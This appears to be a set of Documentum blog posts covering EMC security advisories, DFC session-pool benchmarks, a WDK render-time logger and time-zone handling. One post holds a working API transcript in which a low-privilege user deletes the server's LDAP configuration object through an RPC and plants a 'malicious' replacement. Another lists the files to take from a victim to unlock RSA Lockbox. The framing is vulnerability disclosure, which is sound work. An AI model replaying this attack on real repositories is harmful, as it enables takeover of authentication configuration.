Security enhancements in Webtop 6.8

CVE-2014-4637 quote:

Open redirect vulnerability in EMC Documentum Web Development Kit (WDK) before 6.8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via an unspecified parameter.

Real behaviour of webtop 6.8 (note how it sends login ticket to remote site):

CVE-2014-4636 quote:

Cross-site request forgery (CSRF) vulnerability in EMC Documentum Web Development Kit (WDK) before 6.8 allows remote attackers to hijack the authentication of arbitrary users for requests that perform Docbase operations.

Real behaviour of webtop 6.8:

New joke about security from EMC

Today EMC announced new security advisory:

According to release notes Content Server got following security “improvements” in 7.2:

I have no idea what does mean “dm_crypto_boot utility is enhanced to load an AEK into the shared memory” because this capability exists for a long time in Content Server, for example, quote from Admin Guide 6.7:

so, “dm_crypto_boot utility is enhanced to load an AEK into the shared memory” is not a security enhancement (actually, folks said me that now installer enforces entering passphrase for aek.key during installation), and the only enhancement is a support of RSA Lockbox, moreover, according to EMC it is the only option to “prevent” aek.key file from hijacking, but if you read carefully my post about CVE-2014-2515, you should know that RSA Lockbox does not introduce any security features – to open RSA Lockbox on another machine it’s enough to hijack following files from victim machine:

  • /etc/sysconfig/network – to get hostname
  • /etc/udev/rules.d/70-persistent-net.rules – to get information about network interfaces
  • /etc/sysconfig/network-scripts/ifcfg-*, /var/lib/dhclient/dhclient*.leases – to get more information about network interfaces
  • /proc/version, /proc/swaps, /proc/cpuinfo, /proc/partitions – RSA Lockbox uses these files to bind itself to specific machine

In next post I’m going to demonstrate how does it work.

Is it possible to compromise Documentum by deleting object? Solution

The solution is based on a fact, that Content Server fails to properly maintain references between objects, for example, attacker is able to delete and create his own dm_ldap_config object:

--
-- configuring dm_ldap_config and dm_server_config
-- under superuser account
--
API> create,c,dm_ldap_config
...
0801ffd7805ca7ff
API> save,c,l
...
OK
API> retrieve,c,dm_server_config
...
3d01ffd780000102
API> set,c,l,ldap_config_id
SET> 0801ffd7805ca7ff
...
OK
API> save,c,l
...
OK
API> connect,ssc_dev,test01,test01
...
s1
--
-- attacker is unable to modify dm_ldap_config_object
--
API> destroy,c,0801ffd7805ca7ff
...
[DM_SYSOBJECT_E_NO_DELETE_ACCESS]error:  
    "No delete access for sysobject named ''"

API> save,c,0801ffd7805ca7ff
...
[DM_SYSOBJECT_E_NO_WRITE_ACCESS]error:  
    "No write access for sysobject named ''."


API> get,c,0801ffd7805ca7ff,i_vstamp
...
0
--
-- but attacker is able to delete dm_ldap_config object
-- using dmDisplayConfigExpunge RPC command
--
API> apply,c,0801ffd7805ca7ff,dmDisplayConfigExpunge,
       OBJECT_TYPE,S,dm_ldap_config,i_vstamp,I,0
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : T

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> close,c,q0
...
OK
--
-- dm_ldap_config object got deleted
--
API> revert,c,0801ffd7805ca7ff
...
[DM_API_E_EXIST]error:  
  "Document/object specified by 0801ffd7805ca7ff does not exist."

[DM_SYSOBJECT_E_CANT_FETCH_INVALID_ID]error:  
   "Cannot fetch a sysobject - Invalid object ID : 0801ffd7805ca7ff"

[DM_API_E_EXIST]error:  
   "Document/object specified by 0801ffd7805ca7ff does not exist."

[DM_SYSOBJECT_E_CANT_FETCH_INVALID_ID]error:  
   "Cannot fetch a sysobject - Invalid object ID : 0801ffd7805ca7ff"

[DM_OBJ_MGR_E_FETCH_FAIL]error:  
   "attempt to fetch object with handle 0801ffd7805ca7ff failed"

--
-- now attacker creates his own dm_ldap_config object
--
API>apply,c,0801ffd7805ca7ff,SysObjSave,
       OBJECT_TYPE,S,dm_ldap_config,
       IS_NEW_OBJECT,B,T,
       i_vstamp,I,0,
       object_name,S,malicious,
       i_has_folder,B,T,
       r_object_type,S,dm_ldap_config,
       owner_name,S,test01,
       owner_permit,I,7
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 1

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> revert,c,0801ffd7805ca7ff
...
OK
API> dump,c,0801ffd7805ca7ff
...
USER ATTRIBUTES

  object_name                     : malicious
  title                           :
  subject                         :

API> save,c,0801ffd7805ca7ff
...
OK
--
-- now dm_server_config references to
-- malicious dm_ldap_config object 
--
API> revert,c,3d01ffd780000102
...
OK
API> get,c,l,ldap_config_id
...
0801ffd7805ca7ff

Session management. Horse races

Just raw results without explanation…

Horses: Session, SessionI, SessionII, SessionIII, SessionIV, SessionV, SessionVI, SessionVII, DarkHorse – implement different patterns to acquire DFC-session

DFC Settings:

  • default – means default settings
  • reuse_limit – dfc.session.reuse_limit = 2147483647
  • global_pool – dfc.session.global_pool_enabled=true
  • old pool – dfc.compatibility.useD7SessionPooling=false

Results: DFC benchmark

Preview:



DNF (did not finish) means enabling global pool causes thread-safety issues like:

java.util.NoSuchElementException
        at java.util.LinkedList.getFirst(LinkedList.java:109)
        at com.documentum.fc.client.impl.session.GlobalSessionPool.get(GlobalSessionPool.java:41)
        at com.documentum.fc.client.impl.session.PooledSessionFactory.newSession(PooledSessionFactory.java:33)
        at com.documentum.fc.client.impl.session.SessionManager.getSessionFromFactory(SessionManager.java:134)
        at com.documentum.fc.client.impl.session.SessionManager.newSession(SessionManager.java:72)
        at com.documentum.fc.client.impl.session.SessionManager.getSession(SessionManager.java:191)
        at tel.panfilov.documentum.benchmark.impl.Session.doOp(Session.java:31)
        at tel.panfilov.documentum.benchmark.impl.SessionI.doOp(SessionI.java:14)
        at tel.panfilov.documentum.benchmark.Benchmark.run(Benchmark.java:105)
        at java.lang.Thread.run(Thread.java:662)


java.util.ConcurrentModificationException
        at java.util.LinkedList$ListItr.checkForComodification(LinkedList.java:761)
        at java.util.LinkedList$ListItr.remove(LinkedList.java:729)
        at com.documentum.fc.client.impl.session.GlobalSessionPool.flush(GlobalSessionPool.java:114)
        at com.documentum.fc.client.impl.session.PooledSessionFactory.flush(PooledSessionFactory.java:80)
        at com.documentum.fc.client.impl.session.SessionManager.flushSessions(SessionManager.java:259)
        at com.documentum.fc.client.impl.session.SessionManager.flushSessions(SessionManager.java:287)
        at tel.panfilov.documentum.benchmark.impl.SessionIII.doOp(SessionIII.java:15)
        at tel.panfilov.documentum.benchmark.Benchmark.run(Benchmark.java:105)
        at java.lang.Thread.run(Thread.java:662


Exception in thread "Global Session pool worker" java.util.ConcurrentModificationException
        at java.util.LinkedList$ListItr.checkForComodification(LinkedList.java:761)
        at java.util.LinkedList$ListItr.next(LinkedList.java:696)
        at com.documentum.fc.client.impl.session.GlobalSessionPool.flushExpiredSessions(GlobalSessionPool.java:203)
        at com.documentum.fc.client.impl.session.GlobalSessionPool$ExpirationThread.run(GlobalSessionPool.java:232)

Power Pivot

To investigate performance problems in WDK applications I typically use capabilities of com.documentum.web.env.IFormRenderListener interface, the code below demonstrates a basic idea – when page starts rendering I put date into form return value and when page rendering gets finished I gather and log required information:

/**
 * @author Andrey B. Panfilov <andrew@panfilov.tel>
 */
public class FormRenderLogger implements IFormRenderListener {

    private static final String FORM_RENDER_LOGGER_START_DATE = "__FORM_RENDER_LOGGER_START_DATE__";

    public FormRenderLogger() {
        super();
    }

    public void notifyFormRenderStart(Form form) {
        form.setReturnValue(FORM_RENDER_LOGGER_START_DATE, new Date());
    }

    public void notifyFormRenderFinish(Form form) {
        Date startDate = (Date) form
                .getReturnValue(FORM_RENDER_LOGGER_START_DATE);
        form.removeReturnValue(FORM_RENDER_LOGGER_START_DATE);
        long diff = new Date().getTime() - startDate.getTime();
        String containerId = null;
        String componentId = null;
        ArgumentList initArgs = null;
        Context context = null;
        if (form instanceof Container) {
            containerId = ((Container) form).getId();
            componentId = ((Container) form).getContainedComponentId();
            initArgs = ((Container) form).getInitArgs();
            context = ((Container) form).getContext();
        } else if (form instanceof Component) {
            componentId = ((Component) form).getComponentId();
            initArgs = ((Component) form).getInitArgs();
            context = ((Component) form).getContext();
        }
        String userName = null;
        try {
            if (ComponentDispatcher.isRepositoryAccessRequiredComponent(form
                    .getId())) {
                IDfSessionManager sessionManager = SessionManagerHttpBinding
                        .getSessionManager();
                if (sessionManager != null
                        && SessionManagerHttpBinding.getCurrentDocbase() != null
                        && sessionManager.hasIdentity(SessionManagerHttpBinding
                                .getCurrentDocbase())
                        && form instanceof Component) {
                    userName = ((Component) form).getDfSession()
                            .getLoginUserName();
                }
            }
        } catch (DfException ex) {
            throw new WrapperRuntimeException(ex);
        }
        StringBuilder message = new StringBuilder(50);
        if (containerId != null) {
            message.append("Container: ").append(containerId).append(", ");
        }
        if (componentId != null) {
            message.append("Component: ").append(componentId).append(", ");
        }
        if (userName != null) {
            message.append("User: ").append(userName).append(", ");
        }
        if (initArgs != null) {
            message.append("InitArgs: ").append(initArgs).append(", ");
        }
        if (context != null) {
            message.append("Context: ").append(context).append(", ");
        }
        message.append("Remote IP: ")
                .append(form.getPageContext().getRequest().getRemoteHost())
                .append(", ");
        message.append("Render time: ").append(diff).append("ms");
        DfLogger.debug(this, message.toString().replaceAll("\\{", "[")
                .replaceAll("\\}", "]"), null, null);
    }

}

app.xml:

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<config>
 <scope>
  <application extends="webtop/app.xml">
   ...
   <listeners>
    ...
    <formrender-listeners>
     <listener>
      ...
      <class>FormRenderLogger</class>
     </listener>
    </formrender-listeners>
   </listeners>
  </application>
 </scope>
</config>

Something similar was described earlier by Stephane Marcon in Documentum Monitoring – platform logs’ centralization using Logfaces – Part 2, but the problem is logs accuracy of webtop logs collected by Stephane completely suck. Though, code, given above, does not provide information about delays caused by wdk actions, you can take advantage of IFormRenderListener, IApplicationListener and IRequestListener interfaces to implement more robust solution (see example of usage in Dynamic groups. Advances. Part IV).

But yesterday I have faced with a weird problem. Typically I parse performance logs into tab-delimited file, then load this file into excel and build some reports to figure out what wdk components are slow. But yesterday I have found that customer’s daily logs contain more than 3 million rows and Excel does not support such a amount of data. What to do? Power Pivot comes to the rescue!

Time in Documentum

Since D6 release EMC changed the manner of storing dates in database – now CS stores dates in UTC by default, the problem is the new settings are totally undocumented.

Misleading documentation

Powerlink states:

  1. The r_normal_tz property, in the docbase config object controls how Content Server stores dates in the repository. If set to 0, all dates are stored in UTC time. If set to an offset value, dates are normalized using the offset value before being stored in the repository. If set to an offset value, the property must be set to a time zone offset from UTC time, expressed as seconds. For example, if the offset represents the Pacific Standard Time zone, the offset value is -8*60*60, or -28800 seconds. When the property is set to an offset value, Content Server stores all date values based on the time identified by the time zone offset.
    Refer to the Content Server Administration Guide V6.0 for more information about how the value set for this attribute is used to set the timestamp, depending on whether the client is 6.0 and up or pre-6.0.
  2. To answer the question on how this value is set:
    In a new Documentum 6 or later repository, r_normal_tz is set to 0. In a repository upgraded from a release prior to Version 6, r_normal_tz is set to the offset representing Content Server local time. Therefore, if set and this value was not set manually, this was probably an upgrade from a pre-6.0 version Docbase.
  3. The r_tz_aware set to FALSE makes the Content Server not aware of the time zone.
    This attribute is not documented presently (I do not know why), but if the customer’s r_normal_tz is set to a non-zero value, then they probably upgraded their docbase and possibly FALSE is the default value for this attribute in the case of an upgrade.

This KB article is absolutely incorrect, lets explain.

r_normal_tz

At first glance it is a totally stupid idea to normalize dates using static offset, how are they going to manage daylight saving time? Change r_normal_tz every half of year and restart server? Lets check what happens if we change r_normal_tz in docbase config:

Default settings (r_normal_tz=0, r_tz_aware=T):

Connected to Documentum Server running Release 7.0.0100.0603  Linux.Oracle  
1> select r_normal_tz, r_tz_aware, r_creation_date from dm_docbase_config  
2> go  
r_normal_tz   r_tz_aware    r_creation_date  
------------  ------------  -------------------------  
           0             1  10/31/2013 13:29:41  
(1 row affected)
SQL> ALTER SESSION set NLS_DATE_FORMAT='YYYY-MM-DD HH24:MI:SS';  
  
Session altered.  
  
SQL> SELECT r_creation_date AS r_creation_date_utc,  
       CAST (  
          (FROM_TZ (CAST (r_creation_date AS TIMESTAMP), '+00:00')  
              AT TIME ZONE 'Europe/Moscow') AS DATE)  
          AS r_creation_date  
  FROM dm_docbase_config_sp;  
  
R_CREATION_DATE_UTC R_CREATION_DATE  
------------------- -------------------  
2013-10-31 09:29:41 2013-10-31 13:29:41 

UTC+10 offset:

Connected to Documentum Server running Release 7.0.0100.0603  Linux.Oracle  
1> select r_normal_tz, r_tz_aware, r_creation_date from dm_docbase_config  
2> go  
r_normal_tz   r_tz_aware    r_creation_date  
------------  ------------  -------------------------  
       36000             1  10/31/2013 09:29:41  
(1 row affected) 

UTC-10 offset:

Connected to Documentum Server running Release 7.0.0100.0603  Linux.Oracle  
1> select r_normal_tz, r_tz_aware, r_creation_date from dm_docbase_config  
2> go  
r_normal_tz   r_tz_aware    r_creation_date  
------------  ------------  -------------------------  
      -36000             1  10/31/2013 09:29:41  
(1 row affected)  

So, value of r_normal_tz parameter has nothing in common with timezone: if r_normal_tz=0 CS converts dates to UTC before storing in database, if r_normal_tz!=0 CS stores dates without conversion, e.g. database dates are local. Actually this new behavior has some issues:

  1. When you use some reporting software and write reports against database you should take into account this “feature” and cast dates to local time
  2. UTC timescale is always straightforward but localtime not due to DST. So, there are some ambiguities in converting localtime to UTC and backward, i.e. 2010-10-30 22:30:00 UTC and 2010-10-30 23:30:00 UTC dates have the same representation for Moscow tmezone, so, if you were “lucky” and created document between 2010-10-30 22:30:00 UTC and 2010-10-30 23:30:00 UTC you can’t find it by creation date, because DFC will convert dates you input in dates after 2010-10-30 23:30:00 UTC

r_tz_aware

My dctmpy library is able to emulate two major versions of DFC (e.g. pre-D6 and post-D6) and allows to view traffic passed between CS and client easier than capture network traffic or parse dfc logs. Test script:

#!python  
from dctmpy.docbase import Docbase  
  
  
def main():  
    session = Docbase(host="192.168.2.56", port=12000)  
    session.authenticate("dmadmin", "dmadmin")  
    for e in session.query("SELECT r_creation_date as dt FROM dm_docbase_config"):  
        print e.__buffer__  
  
  
if __name__ == "__main__":  
    main() 

little patch to show serialized data:

Index: dctmpy/obj/collection.py  
===================================================================  
--- dctmpy/obj/collection.py    (revision 34)  
+++ dctmpy/obj/collection.py    (working copy)  
@@ -110,7 +110,9 @@  
  
class CollectionEntry(TypedObject):  
     def __init__(self, **kwargs):  
+        b = kwargs.get("buffer")  
         super(CollectionEntry, self).__init__(**kwargs)  
+        self.__buffer__ = b[0: len(b) - len(self.buffer)]  
  
     def readHeader(self):  
         pass 

post-D6 traffic (note that now my server thinks that all previous dates are local though they was stored initially in UTC):

OBJ QR 0 0 0 1  
B S 4 2013-10-31T05:29:41Z  
0  
0  

pre-D6 traffic:

OBJ QR 1  
xxx Oct 31 09:29:41 2013  
0

So, D6 clients use ISO 8601 format to transfer dates while old clients use some “proprietary” protocol. Now what will happen if we switch r_tz_aware to false?

DFC:

1> select r_normal_tz, r_tz_aware, r_creation_date from dm_docbase_config  
2> go  
r_normal_tz   r_tz_aware    r_creation_date  
------------  ------------  -------------------------  
      -36000             0  10/31/2013 09:29:41  
(1 row affected)  

python:

OBJ QR 0 0 0 1  
B S 4 xxx Oct 31 09:29:41 2013  
0  
0

So, setting r_tz_aware to false switches “date protocol” to pre-D6 version. In practice this means that if you have DFC-clients, that use timezone different from CS, those clients will send and receive wrong data:

~]$ cat > Test.java  
import com.documentum.com.DfClientX;  
import com.documentum.fc.client.IDfSession;  
import com.documentum.fc.common.DfException;  
import com.documentum.fc.common.DfLoginInfo;  
  
/** 
* @author Andrey B. Panfilov <andrew@panfilov.tel> 
*/  
public class Test {  
  
    public static void main(String[] argv) throws DfException {  
        IDfSession session = new DfClientX().getLocalClient().newSession(  
                "ssc_dev", new DfLoginInfo("dmadmin", "dmadmin"));  
        System.out.println(session.getDocbaseConfig()  
                .getTime("r_creation_date")  
                .asString("yyyy.MM.dd G 'at' HH:mm:ss z"));  
        session.disconnect();  
    }  
  
}  
~]$ javac Test.java  
~]$ java Test  
2013.10.31 н.э. at 09:29:41 MSK  
~]$ java -Duser.timezone=Asia/Vladivostok Test  
2013.10.31 н.э. at 09:29:41 VLAT  

DFC

DFC-clients as all java-based clients use their own calendar instead of operating system calendar, also EMC introduced a dfc.time_zone parameter:

# The timezone of this DFC instance.
#
# This value is initialized from the Java Virtual Machine at startup time and
# normally doesn’t need to be specified. Legal values are the timezone IDs
# supported by the Java Virtual Machine.
#
dfc.time_zone =

Now we know that CS and DFC interact with each other using ISO 8601 date format, so what is the purpose of dfc.time_zone parameter? It just helps to initialize instances of SimpleDateFormat, used internally by DFC, with predefined timezone but does not change dates. It’s useful when you want to display dates casted to specific timezone but not able to setup that timezone for current environment (UNIXes has TZ environment variable, Windows – not) or set -Duser.timezone property for java-based application (like IDQL or IAPI):

Connected to Documentum Server running Release 7.0.0100.0603  Linux.Oracle  
Session id is s0  
API> get,c,apiconfig,dfc.time_zone  
...  
Europe/Moscow  
API> get,c,docbaseconfig,r_creation_date  
...  
10/31/2013 09:29:41  
API> set,c,apiconfig,dfc.time_zone  
SET> Asia/Vladivostok  
...  
OK  
API> connect,ssc_dev,dmadmin,dmadmin  
...  
s1  
API> get,c,docbaseconfig,r_creation_date  
...  
10/31/2013 16:29:41

Switching to r_normal_tz=0 from r_normal_tz!=0

Following SQL scenario will help you to generate SQL updates for all date fields:

SET LINES 300
SET PAGES 0
SET TRIMSPOOL ON

  SELECT    CASE
           WHEN ROW_NUMBER ()
                OVER (PARTITION BY utc.table_name ORDER BY utc.column_name) =
                   1
           THEN
              'UPDATE ' || utc.TABLE_NAME || ' SET '
        END
     || utc.COLUMN_NAME
     || ' = DECODE('
     || utc.COLUMN_NAME
     || ', NULL, NULL'
     || ', TO_DATE(''0001/01/01'', ''YYYY/MM/DD''), TO_DATE(''0001/01/01'', ''YYYY/MM/DD'')'
     || ', CAST ((FROM_TZ (CAST ('
     || utc.COLUMN_NAME
     || ' AS TIMESTAMP), ''Europe/Moscow'') AT TIME ZONE ''UTC'') AS DATE))'
     || CASE
           WHEN ROW_NUMBER ()
                OVER (PARTITION BY utc.table_name
                      ORDER BY utc.column_name DESC) <> 1
           THEN
              ','
           ELSE
              ';' || CHR (10) || 'COMMIT;'
        END
FROM user_tab_columns utc, user_tables ut
   WHERE utc.data_type = 'DATE' AND utc.table_name = ut.table_name
ORDER BY utc.table_name, utc.column_name;